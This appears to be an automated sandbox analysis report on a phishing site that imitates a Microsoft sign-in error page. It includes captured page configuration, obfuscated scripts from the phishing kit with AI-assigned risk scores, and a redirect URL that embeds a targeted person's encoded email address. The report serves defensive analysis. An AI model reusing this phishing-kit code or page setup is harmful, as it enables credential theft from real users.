Excluded IPs from analysis (whitelisted): 216.58.208.227, 74.125.131.84, 172.217.17.78, 172.217.17.46, 172.217.17.42, 142.250.181.138, 172.217.19.202, 172.217.19.234, 172.217.19.10, 142.250.181.74, 172.217.17.74, 142.250.181.106, 172.217.17.35
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A

Input	Output
URL: https://google.dz Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://google.dz
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "Script attempts to modify top-level location with URL manipulation and contains iframe redirection logic. While it includes defensive programming (try-catch), the URL manipulation and frame-busting behavior could be used maliciously. However, it appears to be a legitimate session management script with standard iframe handling." }
//<![CDATA[ !function(){var e=window,s=e.document,i=e.$Config\|\|{};if(true){s&&s.body&&(s.body.style.display="block")}else if(false){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f\|\|r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f\|\|r&&f>t?"?":"&", o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}(); //
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "High-risk script showing multiple suspicious indicators: 1) Uses suspicious domain 'gharelokhana.com' instead of legitimate Microsoft domains 2) Contains multiple redirects and endpoints mimicking Microsoft services 3) Appears to be a sophisticated phishing attempt masquerading as Microsoft login error page 4) Contains authentication-related parameters and tokens typical of credential harvesting" }
//<![CDATA[ $Config={"iErrorDesc":0,"iErrorTitle":0,"strMainMessage":"We received a bad request.","strAdditionalMessage":"","strServiceExceptionMessage":"AADSTS90081: An error occurred when the service tried to process a WS-Federation message. The message was invalid, malformatted, or contains potentially dangerous characters.","strTraceId":"aa87e5f3-2698-4fc4-bb9c-b49b7b8e8d01","iErrorCode":90081,"iHttpErrorCode":400,"iViewId":1,"urlCancel":"","strTimestamp":"2024-12-04T16:37:40Z","fShowIssuerHintErrorStrings":true,"urlLearnMoreRiskyApp":"https://5447680c-53cae677.gharelokhana.com/fwlink/?linkid=2133457","iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/","urlDefaultFavicon":"https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlFooterTOU":"https://wwwms.gharelokhana.com/en-US/servicesagreement/","urlFooterPrivacy":"https://1b3d806f-53cae677.gharelokhana.com/en-US/privacystatement","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://fdgfhvcfdgfhhjh.gharelokhana.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://cee0660a-53cae677.gharelokhana.com/{0}/winauth/sso?client-request-id=b82c17d0-0c9e-4185-964d-4e78385da4d6","iwaSsoProbeUrlFormat":"https://cee0660a-53cae677.gharelokhana.com/{0}/winauth/ssoprobe?client-request-id=b82c17d0-0c9e-4185-964d-4e78385da4d6","iwaIFrameUrlFormat":"https://cee0660a-53cae677.gharelokhana.com/{0}/winauth/iframe?client-request-id=b82c17d0-0c9e-4185-964d-4e78385da4d6\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://cee0660a-53cae677.gharelokhana.com/common/winauth/sso/edgeredirect?client-request-id=b82c17d0-0c9e-4185-964d-4e78385da4d6\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"scid":2001,"hpgact":2101,"hpgid":1117,"pgid":"ConvergedError","apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeA8BFRiP-AO_owP2PxanBOXt70XP_vYKTrfn-PBBQ7ifAhakqqF-7GJIncXFkz6mm1eu3uLVpzdj4DLPrv98WLUMFe39_UvOff0nai4R7vx-Jycrjvf5DdiPFDr6DUJDZN10TOETHMYpqWHYWfs1y56KhBzfkFeKitawJs7ZsK2enAjNSgr-e5vOt3WVXS26IYhb0KScTrGZlPCd4YB6tJCAA","canary":"ONTC57PEO7RJ1j0w+/UlaPoyNK4xkGk8rMVerYwWXD8=6:1:CANARY:","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"b82c17d0-0c9e-4185-964d-4e78385da4d6","sessionId":"aa87e5f3-2698-4fc4-bb9c-b49b7b8e8d01","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://fdgfhvcfdgfhhjh.gharelokhana.com/common/instrumentation/reportpageload","dssostatus":"https://fdgfhvcfdgfhhjh.gharelokhana.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This code shows multiple high-risk indicators: heavy obfuscation (using encoded strings and complex function structures), dynamic code execution patterns, and suspicious variable naming conventions. The code is intentionally obscured using hex values and nested functions, making it difficult to determine its true purpose." }
(function(k,c){var Wa=a0k5,K=k();while(!![]){try{var W=parseInt(Wa(0x2c1))/0x1(-parseInt(Wa(0x35e))/0x2)+parseInt(Wa(0x1ce))/0x3+-parseInt(Wa(0x350))/0x4+parseInt(Wa(0x594))/0x5+-parseInt(Wa(0x237))/0x6(-parseInt(Wa(0x4aa))/0x7)+-parseInt(Wa(0x311))/0x8+parseInt(Wa(0x3e0))/0x9;if(W===c)break;else K['push'](K['shift']());}catch(i){K['push'](K['shift']());}}}(a0k4,0x7ecd8),!(function(){var GW=a0k5,k0=(function(){var Ks=!![];return function(KG,Kl){var WJ=a0k5;if(WJ(0x227)===WJ(0x54d))return!!kr(WJ(0x4fc))\|\|!kh(WJ(0x40d))&&void 0x0;else{var KX=Ks?function(){var Wq=WJ;if(Kl){var Ko=Kl[Wq(0x52e)](KG,arguments);return Kl=null,Ko;}}:function(){};return Ks=![],KX;}};}()),k2=(function(){var Ks=!![];return function(KG,Kl){var KX=Ks?function(){var Wh=a0k5;if(Kl){var Kb=Kl[Wh(0x52e)](KG,arguments);return Kl=null,Kb;}}:function(){};return Ks=![],KX;};}());'use strict';var k4={0x1fb8:function(Ks,KG,Kl){var Wx=a0k5;if(Wx(0x401)==='eInrl')km(function(){var Wg=Wx;return kF(kv(Wg(0x464)));},kV[Wx(0x573)](kY,kb+Ks-Kb[Wx(0x458)]()));else{var KX=Kl(0x5cb),Kb=Kl(0x2239),Ko=TypeError;Ks[Wx(0x2df)]=function(Kp){var WR=Wx;if(KX(Kp))return Kp;throw new Ko(Kb(Kp)+WR(0x45c));};}},0x946:function(Ks,KG,Kl){var KX=Kl(0x3af),Kb=Kl(0x2239),Ko=TypeError;Ks['exports']=function(KO){var WM=a0k5;if(KX(KO))return KO;throw new Ko(Kb(KO)+WM(0x245));};},0xf0c:function(Ks,KG,Kl){var Wn=a0k5,KX=Kl(0x2df),Kb=String,Ko=TypeError;Ks[Wn(0x2df)]=function(KO){var WZ=Wn;if(WZ(0x4a0)===WZ(0x2e5)){var Ke=kN[WZ(0x1d0)];kz?kG[WZ(0x2fc)]('rejectionHandled',Ke):km('rejectionhandled',Ke,kW['value']);}else{if(KX(KO))return KO;throw new Ko(WZ(0x454)+Kb(KO)+WZ(0x517));}};},0x1bb7:function(Ks,KG,Kl){var Wy=a0k5,KX=Kl(0x1),Kb=Kl(0x14aa),Ko=Kl(0x16cb)['f'],KO=KX('unscopables'),Kp=Array[Wy(0x4e7)];void 0x0===Kp[KO]&&Ko(Kp,KO,{'configurable':!0x0,'value':Kb(null)}),Ks[Wy(0x2df)]=function(Ke){Kp[KO][Ke]=!0x0;};},0x1143:function(Ks,KG,Kl){var WP=a0k5,KX=Kl(0x2391)['charAt'];Ks[WP(0x2df)]=function(Kb,Ko,KO){var WY=WP;return Ko+(KO?KX(Kb,Ko)[WY(0x375)]:0x1);};},0x1785:function(Ks,KG,Kl){var WS=a0k5,KX=Kl(0x12cf),Kb=TypeError;Ks[WS(0x2df)]=function(Ko,KO){var Wd=WS;if(KX(KO,Ko))return Ko;throw new Kb(Wd(0x54c));};},0x8f5:function(Ks,KG,Kl){var KX=Kl(0x6a8),Kb=String,Ko=TypeError;Ks['exports']=function(KO){if(KX(KO))return KO;throw new Ko(Kb(KO)+'\x20is\x20not\x20an\x20object');};},0x17fe:function(Ks,KG,Kl){var Wz=a0k5,KX=Kl(0xb62),Kb=Kl(0x70f),Ko=Kl(0x92b),KO=Kl(0x22c5),Kp=Kl(0x14b3),Ke=Kl(0x3af),KF=Kl(0x1b30),KI=Kl(0x29e),Kf=Kl(0x1317),KH=Kl(0x1a09),Ku=Array;Ks[Wz(0x2df)]=function(KL){var WQ=Wz,KT=Ko(KL),KE=Ke(this),KN=arguments[WQ(0x375)],Ka=KN>0x1?arguments[0x1]:void 0x0,KJ=void 0x0!==Ka;KJ&&(Ka=KX(Ka,KN>0x2?arguments[0x2]:void 0x0));var Kq,Kh,Kx,Kg,KR,KM,Kn=KH(KT),KZ=0x0;if(!Kn\|\|this===Ku&&Kp(Kn)){for(Kq=KF(KT),Kh=KE?new this(Kq):Ku(Kq);Kq>KZ;KZ++)KM=KJ?Ka(KT[KZ],KZ):KT[KZ],KI(Kh,KZ,KM);}else{for(Kh=KE?new this():[],KR=(Kg=Kf(KT,Kn))[WQ(0x1fe)];!(Kx=Kb(KR,Kg))[WQ(0x201)];KZ++)KM=KJ?KO(Kg,Ka,[Kx[WQ(0x52d)],KZ],!0x0):Kx[WQ(0x52d)],KI(Kh,KZ,KM);}return Kh[WQ(0x375)]=KZ,Kh;};},0x19fb:function(Ks,KG,Kl){var WD=a0k5;if(WD(0x1c7)!=='sgfsC'){var KX=Kl(0x15df),Kb=Kl(0xd40),Ko=Kl(0x1b30),KO=function(Kp){return function(Ke,KF,KI){var Kf=KX(Ke),KH=Ko(Kf);if(0x0===KH)return!Kp&&-0x1;var Ku,KL=Kb(KI,KH);if(Kp&&KF!=KF){for(;KH>KL;)if((Ku=Kf[KL++])!=Ku)return!0x0;}else{for(;KH>KL;KL++)if((Kp\|\|KL in Kf)&&Kf[KL]===KF)return Kp\|\|KL\|\|0x0;}return!Kp&&-0x1;};};Ks[WD(0x2df)]={'includes':KO(!0x0),'indexOf':KO(!0x1)};}else{var Ke=kG(0x70f),KF=km(0x8f5),KI=kW(0x5cb),Kf=kR(0x4fe),KH=kV(0x22a1),Ku=kY;kb[WD(0x2df)]=function(KL,KT){var WA=WD,KE=KL[WA(0x493)];if(KI(KE)){var KN=Ke(KE,KL,KT);return null!==KN&&KF(KN),KN;}if(WA(0x275)===Kf(KL))return Ke(KH,KL,KT);throw new Ku(WA(0x552));};}},0xb33:function(Ks,KG,Kl){var KX=Kl(0xb62),Kb=Kl(0x129a),Ko=Kl(0x849),KO=Kl(0x92b),Kp=Kl(0x1b30),Ke=Kl(0x11c7),KF=Kb([]['push']),KI=function(Kf){var Wr=a0k5;if('qwrPA'===Wr(0x385))(Ka=KF[kR])?KE[kY(0x226)](kb):Kf[KL(0x226)](0x0);else{var K
URL: https://4cd0d823-53cae677.gharelokhana.com/shared/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be a legitimate Microsoft web application code with proper third-party notices and standard web functionality. It includes normal webpack bundling, JSON parsing, and CSS loading. While it makes external requests, they're handled securely with proper error handling and timeouts. The code is not obfuscated and follows standard development practices." }
/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. * * json2.js (2016-05-01) * https://github.gharelokhana.com/douglascrockford/JSON-js * License: Public Domain * * Provided for Informational Purposes Only * * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */ (window.webpackJsonp=window.webpackJsonp\|\|[]).push([[1],Array(487).concat([function(t,e,r){var n=r(0),o=r(13),i=r(3),s=r(12),u=r(787),a=r(4).Array,c=i.StringCustomizationPageId;t.exports=function(t){var e=this,r=t.serverData,f=t.pageId;function l(t){return function(t){var e=0,n=r.slMaxRetry\|\|0;if(!t)return s.reject();return new s((function(r,s){var u={targetUrl:t,contentType:i.ContentType.Json,requestType:o.RequestType.Get,timeout:3e4,successCallback:function(t,e){r(e)},failureCallback:function(t){e<n?(e+=1,new o.Handler(u).sendRequest()):s(t)}};new o.Handler(u).sendRequest()}))}(t).then((function(t){return JSON.parse(t)}),(function(){e.strings.isLoadFailure(!0)}))}e.customCssLoader=new u,e.strings=n.observable({}),e.strings.isLoadComplete=n.observable(!1),e.strings.isLoadFailure=n.observable(!1),e.isLoadComplete=n.observable(!1),e.isLoadFailure=n.observable(!1),e.initialize=function(){},e.load=function(t){var r,n=[],o=[];return t.customStringsFiles&&function(t,r){var n=[];switch(f){case c.ConditionalAccess:t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.AttributeCollection:t.attributeCollection&&n.push(t.attributeCollection);break;case c.ProofUpPage:t.authenticatorNudgeScreen&&n.push(t.authenticatorNudgeScreen),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.ErrorPage:t.adminConsent&&n.push(t.adminConsent),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.LoginPage:t.attributeCollection&&n.push(t.attributeCollection);break;case c.MessagePage:}var o=n.length;if(o)for(var i=0;i<o;i++)r.push(l(n[i]));else e.strings.isLoadComplete(!0)}(t.customStringsFiles,o),t.customCss&&n.push((r=t.customCss,e.customCssLoader.loadAsync(r))),s.allSettled(o).then((function(t){var r=[];a.forEach(t,(function(t){t&&"fulfilled"===t.status&&t.value&&(r=r.concat(t.value))})),e.strings(r),e.strings.isLoadComplete(!0)})),s.allSettled(n.concat(o)).then((function(){e.isLoadComplete(!0)})),s.all(n)["catch"]((function(t){throw e.isLoadFailure(!0),t}))}}},,function(t,e,r){"use strict";var n=r(492),o=r(517).f,i=r(518),s=r(508),u=r(640),a=r(577),c=r(579);t.exports=function(t,e){var r,f,l,h,p,d=t.target,y=t.global,v=t.stat;if(r=y?n:v?n[d]\|\|u(d,{}):n[d]&&n[d].prototype)for(f in e){if(h=e[f],l=t.dontCallGetSet?(p=o(r,f))&&p.value:r[f],!c(y?f:d+(v?".":"#")+f,t.forced)&&l!==undefined){if(typeof h==typeof l)continue;a(h,l)}(t.sham\|\|l&&l.sham)&&i(h,"sham",!0),s(r,f,h,t)}}},function(t,e,r){"use strict";t.exports=function(t){try{return!!t()}catch(e){return!0}}},function(t,e,r){"use strict";var n=r(575),o=Function.prototype,i=o.call,s=n&&o.bind.bind(i,i);t.exports=n?s:function(t){return function(){return i.apply(t,arguments)}}},function(t,e,r){"use strict";(function(e){var r=function(t){return t&&t.Math===Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)\|\|r("object"==typeof window&&window)\|\|r("object"==typeof self&&self)\|\|r("object"==typeof e&&e)\|\|r("object"==typeof this&&this)\|\|function(){return this}()\|\|Function("return this")()}).call(this,r(34))},function(t,e,r){"use strict";var n=r(490);t.exports=!n(
URL: https://4cd0d823-53cae677.gharelokhana.com/shared/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be a legitimate markdown parser implementation (markdown-it) with standard webpack bundling. The code includes proper attribution, licensing information, and uses common JavaScript patterns. The only minor risk factors are URL parsing/manipulation functions, but these are necessary for markdown processing and include proper sanitization checks for potentially dangerous protocols." }
/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. * * json2.js (2016-05-01) * https://github.gharelokhana.com/douglascrockford/JSON-js * License: Public Domain * * Provided for Informational Purposes Only * * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */ (window.webpackJsonp=window.webpackJsonp\|\|[]).push([[3],{1147:function(e,t,r){"use strict";e.exports=r(1148)},1148:function(e,t,r){"use strict";var n=r(503),s=r(1156),o=r(1160),i=r(1161),a=r(1169),c=r(1183),u=r(1196),l=r(780),p=r(1198),h={"default":r(1199),zero:r(1200),commonmark:r(1201)},f=/^(vbscript\|javascript\|file\|data):/,d=/^data:image\/(gif\|png\|jpeg\|webp);/;function m(e){var t=e.trim().toLowerCase();return!f.test(t)\|\|!!d.test(t)}var g=["http:","https:","mailto:"];function _(e){var t=l.parse(e,!0);if(t.hostname&&(!t.protocol\|\|g.indexOf(t.protocol)>=0))try{t.hostname=p.toASCII(t.hostname)}catch(r){}return l.encode(l.format(t))}function k(e){var t=l.parse(e,!0);if(t.hostname&&(!t.protocol\|\|g.indexOf(t.protocol)>=0))try{t.hostname=p.toUnicode(t.hostname)}catch(r){}return l.decode(l.format(t),l.decode.defaultChars+"%")}function b(e,t){if(!(this instanceof b))return new b(e,t);t\|\|n.isString(e)\|\|(t=e\|\|{},e="default"),this.inline=new c,this.block=new a,this.core=new i,this.renderer=new o,this.linkify=new u,this.validateLink=m,this.normalizeLink=_,this.normalizeLinkText=k,this.utils=n,this.helpers=n.assign({},s),this.options={},this.configure(e),t&&this.set(t)}b.prototype.set=function(e){return n.assign(this.options,e),this},b.prototype.configure=function(e){var t,r=this;if(n.isString(e)&&!(e=h[t=e]))throw new Error('Wrong `markdown-it` preset "'+t+'", check name');if(!e)throw new Error("Wrong `markdown-it` preset, can't be empty");return e.options&&r.set(e.options),e.components&&Object.keys(e.components).forEach((function(t){e.components[t].rules&&r[t].ruler.enableOnly(e.components[t].rules),e.components[t].rules2&&r[t].ruler2.enableOnly(e.components[t].rules2)})),this},b.prototype.enable=function(e,t){var r=[];Array.isArray(e)\|\|(e=[e]),["core","block","inline"].forEach((function(t){r=r.concat(this[t].ruler.enable(e,!0))}),this),r=r.concat(this.inline.ruler2.enable(e,!0));var n=e.filter((function(e){return r.indexOf(e)<0}));if(n.length&&!t)throw new Error("MarkdownIt. Failed to enable unknown rule(s): "+n);return this},b.prototype.disable=function(e,t){var r=[];Array.isArray(e)\|\|(e=[e]),["core","block","inline"].forEach((function(t){r=r.concat(this[t].ruler.disable(e,!0))}),this),r=r.concat(this.inline.ruler2.disable(e,!0));var n=e.filter((function(e){return r.indexOf(e)<0}));if(n.length&&!t)throw new Error("MarkdownIt. Failed to disable unknown rule(s): "+n);return this},b.prototype.use=function(e){var t=[this].concat(Array.prototype.slice.call(arguments,1));return e.apply(e,t),this},b.prototype.parse=function(e,t){if("string"!=typeof e)throw new Error("Input data should be a String");var r=new this.core.State(e,this,t);return this.core.process(r),r.tokens},b.prototype.render=function(e,t){return t=t\|\|{},this.renderer.render(this.parse(e,t),this.options,t)},b.prototype.parseInline=function(e,t){var r=new this.core.State(e,this,t);return r.inlineMode=!0,this.core.process(r),r.tokens},b.prototype.renderInline=function(e,t){return t=t\|\|{},this.renderer.render(this.parseInline(e,t),this.options,t)},e.exports=b},1149:
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be a legitimate resource loader script, likely from Microsoft. It contains standard module loading patterns, debug logging, and DOM manipulation for loading scripts/styles. While it uses some legacy practices and DOM manipulation, it's well-structured and doesn't exhibit malicious behaviors. The code includes error handling and cross-origin resource loading with proper security attributes." }
//<![CDATA[ !function(){var e=window,r=e.$Debug=e.$Debug\|\|{},t=e.$Config\|\|{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog\|\|25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs\|\|[],u=n.$WebWatson;try{ var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r\|\|this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do\|\|(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)\|\|o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n\|\|(a=n, u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){ for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener\|\|"load"===e.type\|\|"complete"===r.readyState)&&t()}function i(){ r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){ return f.$Config\|\|f.ServerData\|\|{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src\|\|r.href\|\|"")+"'",e+=", id:"+(r.id\|\|""),e+=", async:"+(r.async\|\|""),e+=", defer:"+(r.defer\|\|"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")\|\|-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){ var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader\|\|{}).slReportFailure\|\|r.slReportFailure\|\|!1}function a(){return(e().loader\|\|{}).redirectToErrorPageOnLoadFailure\|\|!1}function s(){return(e().loader\|\|{}).logByThrowing\|\|!1}function u(e){if(!t()&&!n()){return!1}var r=e.src\|\|e.href\|\|"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0} if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){ var r=g.createElement("script"),t=g.querySelector("
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "High-risk script detected with multiple suspicious indicators: heavily obfuscated code using hex encoding (\x20 format), large array of encoded strings, includes suspicious WebSocket functionality, and contains references to error handling that could be used to hide malicious activity. The presence of 'unhandledRejection' and DOM manipulation capabilities adds to the risk profile." }
function a0O4(){var fL=['OmrJY','Deno/','\x20is\x20not\x20a\x20constructor','yLEJW','object\x20unsubscribed','$(?!\x5cs)','getterFor','772320gPVxwK','RtSVW','nlIgt','Reflect','Bad\x20Promise\x20constructor','AS_ENTRIES','BYGDM','Accessors\x20not\x20supported','pending','shouldUnsubscribe','ZMKhH','WebSocketSubject.error\x20must\x20be\x20called\x20with\x20an\x20object\x20with\x20an\x20error\x20code,\x20and\x20an\x20optional\x20reason:\x20{\x20code:\x20number,\x20reason:\x20string\x20}','unhandledRejection','next','REST','Undefined','xKOuV','actions','WuGDE','_bufferSize','qzIZl','for','script','reason','getOwnPropertyNames','10973960yeAekB','none','Promise\x20can\x27t\x20be\x20resolved\x20itself','schedulerActionCtor','toPromise','send','get\x20','dispatchEvent','jLpHP','[object\x20','LUjWD','psGec','lgDVy','Incorrect\x20invocation','vLHCg','VaOTf','hhWaN','source','toPrimitive','DzgOH','@@iterator','initEvent','observers','CmJES','_innerSubscribe','dezKT','state','FYiYh','ikBUf','Class\x20extends\x20value\x20','WeakMap','536920bxNyrx','hasOwn','species','\x0a\x20\x20','','asyncIterator','GEYqR','errors','cEXBJ','NTkKf','1167654mUMHCG','ZyDOz','errorThrown','sent','search','reactions','RegExp','hAloH','MAFrd','get','_trimBuffer','253094pyaTSP','HZKVR','multiline','LdpIy','(((.+)+)+)+$','MessageChannel','xQBsV','value','kuynV','iGQdv','iTXBf','pop','target','Can\x27t\x20call\x20method\x20on\x20','Dispatch','RqHib','zDWIY','label','host','enter','6DrDvOw','requestAsyncId','JLGCV','initialTeardown','gmwMz','charAt','CBZIs','iterator','HwJHK','Unable\x20to\x20lift\x20unknown\x20Observable\x20type','BROWSER','FmNAU','Null','smRGK','qDuiP','__core-js_shared__','warn','type','self','_output','forced','item','call','_addParent','brwgP','Scheduled\x20action\x20threw\x20falsy\x20error','Provided\x20object\x20does\x20not\x20correctly\x20implement\x20Symbol.observable','ZVjdj','KzQYj','AsyncFunction','MaXJg','Phoat','eDxmB','htmlfile','Unhandled\x20promise\x20rejection','onreadystatechange','closingObserver','FhsAi','Symbol(','eqDFP','\x20required','no\x20WebSocket\x20constructor\x20can\x20be\x20found','VJwqa','_execute','lJyoN','toString','mjGXy','qkmJo','QlHuK','onclose','DNSoG','reject','native-string-replace','hqSNc','_infiniteTimeWindow','piQgI','6232THAhou','1268547VGQxSB','Symbol.asyncIterator\x20is\x20not\x20defined.','mMVfV','E